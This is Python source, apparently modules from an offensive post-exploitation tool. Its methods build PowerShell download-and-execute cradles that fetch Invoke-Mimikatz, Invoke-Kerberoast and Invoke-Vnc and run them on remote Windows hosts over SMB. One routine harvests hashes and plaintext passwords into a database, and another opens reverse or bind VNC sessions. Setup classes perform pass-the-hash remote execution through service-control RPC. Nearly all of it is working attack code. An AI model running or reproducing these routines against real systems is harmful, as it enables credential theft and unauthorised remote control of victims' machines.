def run(self, target, args, smb_con, loggers, config_obj): logger = loggers['console'] timeout = args.timeout loggers['console'].info([smb_con.host, smb_con.ip, self.name.upper(), 'Attempting Invoke-Mimikatz']) try: # Define Script Source if args.fileless: srv_addr = get_local_ip() script_location = 'http://{}/Invoke-Mimikatz.ps1'.format(srv_addr) setattr(args, 'timeout', timeout + 60) else: script_location = 'https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1' setattr(args, 'timeout', timeout + 25) logger.debug('Script source: {}'.format(script_location)) # Setup PS1 Script cmd = """Invoke-Mimikatz -Command \"{}\"""".format(self.args['COMMAND']['Value']) launcher = powershell.gen_ps_iex_cradle(script_location, cmd) try: # Execute cmd = powershell.create_ps_command(launcher, loggers['console'], force_ps32=args.force_ps32, no_obfs=args.no_obfs, server_os=smb_con.os) results = code_execution(smb_con, args, target, loggers, config_obj, cmd, return_data=True) # Display Output if not results: loggers['console'].fail([smb_con.host, smb_con.ip, self.name.upper(), 'No output returned']) return elif args.debug: for line in results.splitlines(): loggers['console'].debug([smb_con.host, smb_con.ip, self.name.upper(), line]) # Parse results and send creds to db db_updates = 0 for cred in self.parse_mimikatz(results): if cred[0] == "hash": smb_con.db.update_user(cred[2], '', cred[1], cred[3]) loggers['console'].success([smb_con.host, smb_con.ip, self.name.upper(),"{}\\{}:{}".format(cred[1],cred[2],cred[3])]) db_updates += 1 elif cred[0] == "plaintext": smb_con.db.update_user(cred[2], cred[3], cred[1], '') loggers['console'].success([smb_con.host, smb_con.ip, self.name.upper(),"{}\\{}:{}".format(cred[1], cred[2], cred[3])]) db_updates += 1 loggers['console'].info([smb_con.host, smb_con.ip, self.name.upper(), "{} credentials updated in database".format(db_updates)]) # write results to file file_name = 'mimikatz_{}_{}.txt'.format(target, get_filestamp()) tmp_logger = setup_file_logger(args.workspace, file_name, ext='') tmp_logger.info(results) loggers['console'].info([smb_con.host, smb_con.ip, self.name.upper(), "Output saved to: {}".format(file_name)]) except Exception as e: if str(e) == "list index out of range": loggers['console'].fail([smb_con.host, smb_con.ip, self.name.upper(), "{} failed".format(self.name)]) else: loggers['console'].fail([smb_con.host, smb_con.ip, self.name.upper(), str(e)]) except Exception as e: logger.debug("{} Error: {}".format(self.name, str(e)))
def run(self, target, args, smb_con, loggers, config_obj): cmd = '' logger = loggers['console'] timeout = args.timeout loggers['console'].info([smb_con.host, smb_con.ip, self.name.upper(), 'Attempting Invoke-VNC']) try: # Define Script Source if args.fileless: srv_addr = get_local_ip() script_location = 'http://{}/Invoke-Vnc.ps1'.format(srv_addr) setattr(args, 'timeout', timeout + 30) else: script_location = 'https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/management/Invoke-Vnc.ps1' setattr(args, 'timeout', timeout + 15) logger.debug('Script source: {}'.format(script_location)) # Setup PS1 Script if self.args['CONTYPE']['Value'] == 'reverse': if not self.args['IPADDRESS']['Value']: self.args['IPADDRESS']['Value'] = get_local_ip() cmd = """Invoke-Vnc -ConType reverse -IpAddress {} -Port {} -Password {}""".format(self.args['IPADDRESS']['Value'],self.args['PORT']['Value'],self.args['PASSWORD']['Value']) elif self.args['CONTYPE']['Value'] == 'bind': cmd = """Invoke-Vnc -ConType bind -Port {} -Password {}""".format(self.args['PORT']['Value'],self.args['PASSWORD']['Value']) else: loggers['console'].success([smb_con.host, smb_con.ip, self.name.upper(), "Invalid CONTYPE"]) exit(1) launcher = powershell.gen_ps_iex_cradle(script_location, cmd) # Execute cmd = powershell.create_ps_command(launcher, loggers['console'], force_ps32=args.force_ps32, no_obfs=args.no_obfs, server_os=smb_con.os) x = code_execution(smb_con, args, target, loggers, config_obj, cmd, return_data=True) # Display Output if not x.startswith('Code execution failed'): for line in x.splitlines(): loggers['console'].info([smb_con.host, smb_con.ip, self.name.upper(), line]) else: loggers['console'].info([smb_con.host, smb_con.ip, self.name.upper(), "Command execute with no output"]) except Exception as e: logger.debug("{} Error: {}".format(self.name, str(e)))
def run(self, target, args, smb_con, loggers, config_obj): logger = loggers['console'] timeout = args.timeout loggers['console'].info([ smb_con.host, smb_con.ip, self.name.upper(), 'Attempting Invoke-Kerberoast' ]) try: # Define Script Source if args.fileless: srv_addr = get_local_ip() script_location = 'http://{}/Invoke-Kerberoast.ps1'.format( srv_addr) setattr(args, 'timeout', timeout + 30) else: script_location = 'https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1' setattr(args, 'timeout', timeout + 15) logger.debug('Script source: {}'.format(script_location)) # Setup PS1 Script launcher = powershell.gen_ps_iex_cradle(script_location, '') # Execute cmd = powershell.create_ps_command(launcher, loggers['console'], force_ps32=args.force_ps32, no_obfs=args.no_obfs, server_os=smb_con.os) x = code_execution(smb_con, args, target, loggers, config_obj, cmd, return_data=True) # Display Output for line in x.splitlines(): loggers['console'].success( [smb_con.host, smb_con.ip, self.name.upper(), line]) # write results to file file_name = 'kerberoast_{}_{}.txt'.format(target, get_filestamp()) tmp_logger = setup_file_logger(args.workspace, file_name, ext='') tmp_logger.info(x) loggers['console'].info([ smb_con.host, smb_con.ip, self.name.upper(), "Output saved to: {}".format(file_name) ]) except Exception as e: logger.debug("{} Error: {}".format(self.name, str(e)))
def run(self, target, args, smb_con, loggers, config_obj): logger = loggers['console'] try: # Get script: if args.fileless: srv_addr = get_local_ip() script_location = 'http://{}/Invoke-Mimikatz.ps1'.format(srv_addr) else: script_location = 'https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1' logger.debug('Fetching script from {}'.format(script_location)) # Setup timeout = args.timeout setattr(args, 'timeout', timeout+10) # Modify timeout to allow execution time cmd = """Invoke-Mimikatz -Command \"{}\"""".format(self.args['COMMAND']['Value']) launcher = powershell.gen_ps_iex_cradle(script_location, cmd) try: # Execute cmd = powershell.create_ps_command(launcher, loggers['console'], force_ps32=args.force_ps32, obfs=args.obfs, server_os=smb_con.os) loggers['console'].info([smb_con.host, smb_con.ip, self.name.upper(), 'Attempting Invoke-Mimikatz']) x = code_execution(smb_con, args, target, loggers, config_obj, cmd=cmd, return_data=True) # Display Output for line in x.splitlines(): loggers['console'].success([smb_con.host, smb_con.ip, self.name.upper(), line]) # Parse results and send creds to db db_updates = 0 for cred in self.parse_mimikatz(x): if cred[0] == "hash": smb_con.db.update_user(cred[2], '', cred[1], cred[3]) db_updates += 1 elif cred[0] == "plaintext": smb_con.db.update_user(cred[2], cred[3], cred[1], '') db_updates += 1 loggers['console'].success([smb_con.host, smb_con.ip, self.name.upper(), "{} credentials updated in database".format(db_updates)]) except Exception as e: loggers['console'].debug([smb_con.host, smb_con.ip, self.name.upper(), str(e)]) except Exception as e: logger.debug("{} Error: {}".format(self.name, str(e)))
def __init__(self, logger, host, args, smb_con, share_name=''): self.outfile = gen_random_string() self.debug = args.debug self.logger = logger self.host = host self.domain = args.domain self.username = args.user self.password = args.passwd self.hash = args.hash self.lmhash = '' self.nthash = '' self.pwd = str('C:\\') self.shell = 'cmd.exe /Q /c ' self.noOutput = args.no_output self.outputBuffer = '' self.timeout = args.timeout self.smbcon = smb_con self.fileless_output = False if share_name: # Fileless output self.fileless_output = True self.ip = get_local_ip() self.share = share_name self.path = "\\" else: # Filed or Remote output self.ip = args.exec_ip self.share = args.exec_share self.path = args.exec_path if self.hash: try: self.lmhash, self.nthash = self.hash.split(':') except: self.nthash = self.hash
def __init__(self, logger, host, args, smb_con, port=445, share_name=''): self.logger = logger self.outfile = gen_random_string() self.batchFile = gen_random_string() + '.bat' self.__serviceName = gen_random_string() self.__rpctransport = None self.__scmr = None self.__conn = None self.__output = None self.__shell = '%COMSPEC% /Q /c ' # self.__mode = mode # self.__aesKey = aesKey # self.__doKerberos = doKerberos # Auth self.smbcon = smb_con self.host = host self.port = port self.username = args.user self.password = args.passwd self.domain = args.domain self.hash = args.hash self.lmhash = '' self.nthash = '' self.timeout = args.timeout self.debug = args.debug self.noOutput = args.no_output self.fileless_output = False if share_name: # Fileless output self.fileless_output = True self.ip = get_local_ip() self.share = share_name self.path = "\\" else: # Filed or Remote output self.ip = args.exec_ip self.share = args.exec_share self.path = args.exec_path if self.hash: try: self.lmhash, self.nthash = self.hash.split(':') except: self.nthash = self.hash stringbinding = 'ncacn_np:{}[\pipe\svcctl]'.format(self.host) self.logger.debug('StringBinding {}'.format(stringbinding)) self.__rpctransport = transport.DCERPCTransportFactory(stringbinding) self.__rpctransport.set_dport(self.port) if hasattr(self.__rpctransport, 'setRemoteHost'): self.__rpctransport.setRemoteHost(self.host) if hasattr(self.__rpctransport, 'set_credentials'): # This method exists only for selected protocol sequences. self.__rpctransport.set_credentials(self.username, self.password, self.domain, self.lmhash, self.nthash) #rpctransport.set_kerberos(self.__doKerberos, self.__kdcHost) self.__scmr = self.__rpctransport.get_dce_rpc() self.__scmr.connect() s = self.__rpctransport.get_smb_connection() # We don't wanna deal with timeouts from now on. s.setTimeout(self.timeout) self.__scmr.bind(scmr.MSRPC_UUID_SCMR) resp = scmr.hROpenSCManagerW(self.__scmr) self.__scHandle = resp['lpScHandle']